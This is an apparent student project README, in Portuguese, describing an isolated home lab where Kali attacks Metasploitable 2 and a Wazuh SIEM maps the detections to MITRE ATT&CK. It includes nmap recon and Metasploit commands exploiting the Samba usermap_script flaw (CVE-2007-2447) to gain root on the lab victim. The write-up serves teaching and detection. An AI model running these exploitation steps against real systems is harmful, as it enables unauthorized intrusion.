
Laboratório de ataque AD/Linux isolado: CVE-2007-2447 explorado por meio do Metasploit, detectado com Wazuh SIEM mapeado para MITRE ATT&CK (T1190, T1059)
Projeto B.Tech (BTP) | IIIT Pune Baseado em: "Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring" — ICCCNT 2023, IIT Delhi
Um laboratório doméstico de cibersegurança totalmente funcional, construído em uma única máquina usando ferramentas gratuitas e de código aberto. O laboratório simula um ciclo de vida de ataque do mundo real — Reconhecimento → Exploração → Detecção — e demonstra como um SIEM pode detectar e mapear ataques para a estrutura MITRE ATT&CK em tempo real.
┌─────────────────────────────────────────────────┐
│ VirtualBox — Internal Network │
│ (cyberlab, 10.0.0.x/24) │
│ │
│ ┌──────────┐ ┌──────────────┐ ┌──────────┐ │
│ │ Kali │ │ Metasploitable│ │ Ubuntu │ │
│ │ 10.0.0.1 │◄─►│ 10.0.0.2 │◄─►│ 10.0.0.3 │ │
│ │ ATTACKER │ │ VICTIM │ │ SIEM │ │
│ └──────────┘ └──────────────┘ └──────────┘ │
└─────────────────────────────────────────────────┘
Host-Only Adapter (192.168.56.103)
→ Wazuh Dashboard access from browser
Crie uma Rede Interna chamada cyberlab no VirtualBox. Todas as três VMs recebem este adaptador. A VM Ubuntu/Wazuh recebe um Adaptador Host-Only adicional para que você possa acessar o dashboard pelo navegador.
cyberlab# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.1
netmask 255.255.255.0
sudo systemctl restart networkingcyberlab# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.2
netmask 255.255.255.0
⚠️ Nunca exponha o Metasploitable 2 à internet. Ele é propositalmente inseguro.
cyberlab interno + Host-Only/etc/netplan/01-network-manager-all.yaml):network:
version: 2
renderer: NetworkManager
ethernets:
enp0s3:
addresses:
- 10.0.0.3/24
enp0s8:
dhcp4: true
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
https://192.168.56.103 (pelo navegador do host)Como o Metasploitable 2 não pode executar um agente do Wazuh, configure o encaminhamento de syslog para monitoramento sem agente:
No Metasploitable, adicione ao /etc/rsyslog.conf:
*.* @10.0.0.3:514
No Wazuh (Ubuntu), habilite a entrada de syslog em /var/ossec/etc/ossec.conf:
<remote>
<connection>syslog</connection>
<port>514</port>
<protocol>udp</protocol>
</remote>
Reinicie o Wazuh: sudo systemctl restart wazuh-manager
# From Kali
nmap -sV -O 10.0.0.2
Principais serviços descobertos no Metasploitable 2:
Mais de 20 portas abertas descobertas. SO identificado: Linux 2.6.x
Vulnerabilidade: CVE-2007-2447 — Injeção de comando usermap_script do Samba
Permite execução remota de código sem autenticação por meio de requisições MS-RPC malformadas no Samba 3.0.0–3.0.25rc3.
# From Kali — launch Metasploit
msfconsole
# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run
# Verify root access
whoami
# Output: root
Após a exploração, o Wazuh detectou e mapeou automaticamente os eventos para MITRE ATT&CK:
Total de eventos detectados: 55+
Acesse o dashboard em https://192.168.56.103 → Security Events → MITRE ATT&CK
cybersecurity-home-lab/
│
├── README.md ← You are here
├── network-config/
│ ├── kali-interfaces.txt ← Kali static IP config
│ ├── metasploitable-interfaces.txt
│ └── ubuntu-netplan.yaml ← Ubuntu/SIEM netplan config
├── wazuh-config/
│ └── ossec.conf ← Wazuh syslog/agent config
├── screenshots/
│ ├── nmap-scan.png
│ ├── metasploit-exploit.png
│ ├── wazuh-dashboard.png
│ └── wazuh-alerts-table.png
└── report/
└── ICCCNT_2023_paper.pdf ← Reference research paper
Dadiyala, C. et al. (2023). Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring. 14th International Conference on Computing, Communication and Networking Technologies (ICCCNT), IIT Delhi. IEEE-56998.
Este laboratório é construído inteiramente em máquinas virtuais isoladas, sem acesso à internet durante as simulações de ataque. Todas as ferramentas e técnicas são usadas estritamente para fins educacionais em um ambiente controlado. Não tente reproduzir nenhuma técnica de ataque em sistemas que você não possui ou para os quais não tenha permissão explícita para testar.
Apresentado por Harshita Verma | IIIT Pune
| VM | Função | IP | Ferramentas |
|---|
| Kali Linux 2026.1 | Atacante | 10.0.0.1 | Nmap, Metasploit |
| Metasploitable 2 | Vítima | 10.0.0.2 | 20+ vulnerabilidades |
| Ubuntu 22.04 + Wazuh | SIEM | 10.0.0.3 | Wazuh v4.7.5 |
| Ferramenta | Versão | Finalidade |
|---|
| VirtualBox | 7.x | Hypervisor — executa todas as VMs em um único host |
| Kali Linux | 2026.1 | SO de teste de penetração (ofensivo) |
| Metasploitable 2 | v2.0 | Alvo propositalmente vulnerável |
| Wazuh | v4.7.5 | SIEM de código aberto (defensivo) |
| Nmap | Mais recente | Varredura de rede/portas |
| Metasploit Framework | Mais recente | Framework de exploração |
| Porta | Serviço | Versão |
|---|
| 21/tcp | FTP | vsftpd 2.3.4 |
| 22/tcp | SSH | OpenSSH 4.7p1 |
| 80/tcp | HTTP | Apache 2.2.8 |
| 139/445 | SMB | Samba 3.x–4.x |
| 3306/tcp | MySQL | 5.0.51a |
| 5432/tcp | PostgreSQL | 8.3 |
| ID da Regra | Descrição | Técnica MITRE | Tática |
|---|
| 5402 | Execução de sudo para ROOT bem-sucedida | T1548.003 | Escalação de Privilégios |
| 5501 | PAM: Sessão de login aberta | T1078 | Acesso Inicial / Persistência |
| 5502 | PAM: Sessão de login fechada | T1078 | Evasão de Defesa |
| 502 | Servidor Wazuh iniciado | — | Detecção Ativa |